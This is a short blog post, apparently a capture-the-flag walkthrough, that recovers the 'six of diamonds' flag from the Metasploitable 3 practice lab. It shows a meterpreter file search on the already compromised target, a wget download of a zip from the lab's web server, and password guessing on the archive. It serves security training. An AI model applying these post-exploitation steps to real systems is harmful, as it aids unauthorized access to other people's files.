Wednesday, January 4, 2017

The Six of Diamonds

Metasploitable 3

The Six of Diamonds


Still using the same meterpreter session exploited in Elasticsearch we can use the search command to find cards if we know their names.

meterpreter > search -f *diamonds*
Found 6 results...
    C:\jack_of_diamonds.png
    C:\Program Files\OpenSSH\home\Public\Pictures\ten_of_diamonds.png (406134 bytes)
    C:\Users\Public\Pictures\ten_of_diamonds.png (406134 bytes)
    C:\inetpub\wwwroot\six_of_diamonds.zip (384916 bytes)
    C:\vagrant\resources\flags\six_of_diamonds.zip (384916 bytes)
    C:\vagrant\resources\flags\ten_of_diamonds.png (406134 bytes)
meterpreter >

Looking at the path it seems the six_of_diamonds.zip file is probably on the main IIS website on port 80 so I downloaded it from there.


root@igor-kali:~# wget http://10.20.10.19/six_of_diamonds.zip
--2016-12-09 23:37:15--  http://10.20.10.19/six_of_diamonds.zip
Connecting to 10.20.10.19:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 384916 (376K) [application/x-zip-compressed]
Saving to: ‘six_of_diamonds.zip’

six_of_diamonds.zi 100%[================>] 375.89K  --.-KB/s    in 0.003s 

2016-12-09 23:37:15 (105 MB/s) - ‘six_of_diamonds.zip’ saved [384916/384916]

 I proceeded to use ‘unzip’ but it prompted me for a password, I tried a couple and failed, then I guessed the password. (tip: it's always the same password)


root@igor-kali:~# unzip six_of_diamonds.zip
Archive:  six_of_diamonds.zip
[six_of_diamonds.zip] six_of_diamonds.png password:
password incorrect--reenter:
password incorrect--reenter:
 extracting: six_of_diamonds.png     


That's a creepy looking dude

No comments:

Post a Comment